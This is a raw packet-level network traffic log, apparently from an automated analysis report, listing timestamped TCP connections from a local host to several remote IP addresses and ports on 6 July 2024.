                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.662121058 CEST44349937104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.662283897 CEST44349937104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.662347078 CEST49937443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.662559986 CEST49937443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.735979080 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.736011982 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.736076117 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.736440897 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.736462116 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.737433910 CEST4993980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.742347002 CEST8049939188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.742420912 CEST4993980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.742455959 CEST4993980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.747395039 CEST8049939188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.747443914 CEST4993980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.752367020 CEST8049939188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.002757072 CEST66604993494.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.002809048 CEST499346660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.366444111 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.366503000 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.368056059 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.368065119 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.368271112 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.369417906 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.369448900 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.507006884 CEST8049939188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.507323027 CEST8049939188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.507368088 CEST4993980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.509321928 CEST4993980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.612658978 CEST4994080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.617628098 CEST8049940188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.617697954 CEST4994080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.617738008 CEST4994080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.622642994 CEST8049940188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.622685909 CEST4994080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.627471924 CEST8049940188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.673338890 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674005032 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674045086 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674129009 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674149036 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674161911 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674199104 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674206018 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674213886 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674246073 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674257040 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674293995 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674307108 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674323082 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674334049 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674339056 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674351931 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674408913 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674417019 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674428940 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674439907 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674443960 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674448967 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674452066 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674458027 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674664021 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674673080 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674690008 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674698114 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674700022 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674707890 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674716949 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674721956 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674730062 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674734116 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674815893 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674823046 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674828053 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674843073 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674854994 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674863100 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674877882 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674884081 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674885988 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674894094 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674897909 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674911976 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.674916983 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.675002098 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.675013065 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.675028086 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.675036907 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.675137043 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.675143957 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.675153971 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.675163984 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.675210953 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.675219059 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.675241947 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.675251961 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.675271988 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.675271988 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.675288916 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.686557055 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.686690092 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.686702967 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.686716080 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.686728954 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.686729908 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.686736107 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.686749935 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.686764956 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.686764956 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.686794996 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.686800957 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.686852932 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.686852932 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.686871052 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.686885118 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.686954975 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.686973095 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.686990023 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.687000036 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.687011957 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.687026978 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.687026978 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.696120024 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:08.351695061 CEST8049940188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:08.352719069 CEST8049940188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:08.352900982 CEST4994080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:08.353465080 CEST4994080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:08.456366062 CEST4994180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:08.461453915 CEST8049941188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:08.461582899 CEST4994180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:08.461582899 CEST4994180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:08.466461897 CEST8049941188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:08.467904091 CEST4994180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:08.473643064 CEST8049941188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:08.560606956 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:08.560695887 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:08.560863018 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:08.560914040 CEST44349938149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:08.561012983 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:08.561012983 CEST49938443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:29:09.211308002 CEST8049941188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:09.211818933 CEST8049941188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:09.211865902 CEST4994180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:09.213352919 CEST4994180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:09.315612078 CEST4994380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:09.320597887 CEST8049943188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:09.320662022 CEST4994380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:09.320698023 CEST4994380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:09.325454950 CEST8049943188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:09.325532913 CEST4994380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:09.330348969 CEST8049943188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:10.067461014 CEST8049943188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:10.068088055 CEST8049943188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:10.068563938 CEST4994380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:10.069291115 CEST4994380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:10.174954891 CEST4994480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:10.179856062 CEST8049944188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:10.180094004 CEST4994480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:10.180094004 CEST4994480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:10.185628891 CEST8049944188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:10.185750961 CEST4994480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:10.190514088 CEST8049944188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:11.092449903 CEST8049944188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:11.092977047 CEST8049944188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:11.093028069 CEST4994480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:11.094520092 CEST4994480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:11.206202984 CEST4994580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:11.211327076 CEST8049945188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:11.211390972 CEST4994580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:11.211433887 CEST4994580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:11.216284990 CEST8049945188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:11.216335058 CEST4994580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:11.221199036 CEST8049945188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.020787954 CEST499346660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.023323059 CEST499466660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.025641918 CEST66604993494.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.028276920 CEST66604994694.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.028502941 CEST499466660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.028759956 CEST499466660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.035087109 CEST66604994694.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.040713072 CEST8049945188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.041779995 CEST8049945188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.042010069 CEST4994580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.042646885 CEST4994580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.124896049 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.133466959 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.133583069 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.140045881 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.143785954 CEST4994780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.148694992 CEST8049947188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.148825884 CEST4994780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.148825884 CEST4994780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.157774925 CEST8049947188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.158108950 CEST4994780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.164781094 CEST8049947188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.455455065 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.550205946 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.601522923 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.619787931 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.624723911 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.624897957 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.629936934 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:13.677035093 CEST66604994694.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:13.677129984 CEST499466660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:16.160640001 CEST8049947188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:16.160832882 CEST8049947188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:16.161159992 CEST4994780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:16.162862062 CEST4994780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:16.271801949 CEST4994980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:16.276735067 CEST8049949188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:16.276870966 CEST4994980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:16.276870966 CEST4994980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:16.281727076 CEST8049949188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:16.283997059 CEST4994980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:16.288918018 CEST8049949188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:17.007226944 CEST8049949188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:17.008382082 CEST8049949188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:17.008430958 CEST4994980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:17.009325981 CEST4994980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:17.112561941 CEST4995080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:17.117830038 CEST8049950188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:17.117896080 CEST4995080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:17.117980957 CEST4995080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:17.122725964 CEST8049950188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:17.122773886 CEST4995080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:17.127568960 CEST8049950188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:18.337018013 CEST8049950188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:18.337035894 CEST8049950188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:18.337095022 CEST8049950188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:18.337133884 CEST4995080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:18.339210987 CEST4995080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:18.339559078 CEST4995080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:18.440658092 CEST4995180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:18.445529938 CEST8049951188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:18.447887897 CEST4995180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:18.447887897 CEST4995180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:18.453322887 CEST8049951188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:18.453773975 CEST4995180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:18.459162951 CEST8049951188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:18.690922976 CEST499466660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:18.691185951 CEST499526660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:18.696119070 CEST66604994694.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:18.696134090 CEST66604995294.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:18.696316004 CEST499526660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:18.696552038 CEST499526660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:18.701378107 CEST66604995294.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:19.411593914 CEST8049951188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:19.411612034 CEST8049951188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:19.411668062 CEST4995180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:19.414071083 CEST4995180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:19.518948078 CEST4995380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:19.523843050 CEST8049953188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:19.523907900 CEST4995380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:19.523977041 CEST4995380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:19.529427052 CEST8049953188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:19.529475927 CEST4995380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:19.535336971 CEST8049953188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:20.203171015 CEST8049953188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:20.204297066 CEST8049953188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:20.204382896 CEST4995380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:20.205410957 CEST4995380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:20.325210094 CEST66604995294.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:20.325661898 CEST499526660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:20.356717110 CEST4995480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:20.361521006 CEST8049954188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:20.361651897 CEST4995480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:20.361651897 CEST4995480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:20.366455078 CEST8049954188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:20.366750956 CEST4995480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:20.371582031 CEST8049954188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:21.131361008 CEST8049954188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:21.132553101 CEST8049954188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:21.132601023 CEST4995480192.168.2.4188.114.96.3
